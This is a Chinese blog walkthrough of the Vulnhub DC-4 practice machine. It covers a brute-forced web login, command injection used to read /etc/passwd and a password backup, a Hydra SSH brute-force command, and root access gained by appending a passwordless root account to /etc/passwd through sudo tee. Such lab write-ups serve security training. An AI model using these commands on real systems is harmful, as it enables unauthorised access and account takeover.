首页 > 其他分享 >Vulnhub | DC-4

Vulnhub | DC-4

时间:2022-08-21 09:34:00浏览次数:51  
标签:尝试 爆破 passwd jim DC etc Vulnhub ssh

信息搜集

通过mac地址找真实IP地址

 

真实IP为192.168.0.151,开放端口80,22

 

爆破密码

 

访问后是一个登录框,爆破尝试

admin/happy

访问后是一个登录框,爆破尝试

admin/happy

 

命令执行

登陆后有一个命令执行选项,抓包修改参数可以执行任意命令

 

反弹shell失败了

找一找敏感文件

cat+/etc/passwd

 

三个用户名 jim、sam、charles

ls -alhR /homejim文件下有一个oldpassword

 

cat+/home/jim/backups/old-passwords.bak得到了很多密码

 

ssh爆破

结合开放的22端口,以及etc/paswd下的用户名 jim、sam、charles

尝试一下SSH爆破

hydra -l jim -P passwd.txt -vV -f -t 1 192.168.0.151 ssh

经过漫长的等待,终于拿到了密码

 

 

提权

sudo -l 失败

查找suid文件

find / -perm -u=s -type f 2>/dev/null 没什么可利用的

 

 

查看一下当前文件,发现一封来自root的信封

 

看一下有没有来回的信封

cd /var/mail

cat /jim

 

Charles/^xHhA&hvim0y

尝试ssh登录

提权尝试

sudo -l

 

看一下用法

-a参数可以写入文件内容, 使用命令在/etc/passwd中写入一个账号

echo "test::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

接着直接ssh登录

su test

登上来直接是root权限

接着就是靶机的最后一步,找flag

find / -name flag*

 

 

 

 

 

标签:尝试,爆破,passwd,jim,DC,etc,Vulnhub,ssh
From: https://www.cnblogs.com/mlxwl/p/16609320.html

相关文章

  • Vulnhub | DC-2
    靶场地址https://www.vulnhub.com/entry/dc-2,311/信息搜集探查IP这里和DC-1一样因为下载的镜像打开是一个登录界面,无法知道它的IP地址,所以这里需要借助一下VMware的......
  • 关于appendChild报错
    今天在做尚优选html页面时,将一个<li>添加到一个<ul>中使用appendChild(li)报出Cannotreadproperty'appendChild'ofnull异常报错原因:获取不到元素节点从而导致的异常......
  • 15.DC导出CA让Horizon Client CA导入
    客户端安装后提示证书错误 去同域服务器任意一台的mmc-添加证书中找到 右键-所有任务-导出导出过程   放到桌面    复制去其他客户端  mmc......
  • STM32CubeMX ADC+DMA
    1.选择使用的通道  2.参数配置独立模式、数据右对齐、扫描转换(多通道默认配置)、连续扫描、使能常规转换组、6通道、软件触发、Rank单独配置,否则全部默认一样的,到时......
  • 5G时代,3DCAT助力AR/VR内容上云
    一、5G网络三大应用场景目前中国的5G技术正在加速发展,5G网络拥有增强型移动宽带、超高可靠低时延通信、海量机器类通信三大技术特点和应用场景。其中增强型移动宽带技术特......
  • 一张图看懂 OrchardCore 中的模块加载及依赖管理
    先上图   Manifest.cs  Module与FeatureModule特性 如果模块中只有一个功能【Feature】那么可以直接用Module替代,也就是///<summary>///......
  • 【靶机详解】DC-2
    目录环境搭建环境信息渗透思路1信息收集2漏洞发现3漏洞利用知识点汇总参考资料环境搭建下载靶机(DC-2靶机下载)解压后,使用VMware打开,并将攻击机和靶机的网卡,设置为NA......
  • DC-9
    1、文件包含:http://192.168.142.139/welcome.php?file=../../../../../../../../../etc/passwd2、敲门服务:http://192.168.178.135/manage.php?file=../../../.......
  • stm32的ADC采样(基于HAL库)
    什么是ADC转换? CUBEMX配置ADC时需要注意的几个点:1.   adc采样的精度最高位数是16位。 这个设置是微秒级别的。所以不影响。 ......
  • [BJDCTF2020]Mark loves cat-1|源代码泄露|变量覆盖
    主要考察了:源代码泄露、变量覆盖共展示了三种获取flag的方式1、打开题目查看未发现有效信息,查看源代码信息,发现返回的dog信息,结果如下:2、使用dirmap进行目录扫描,发现......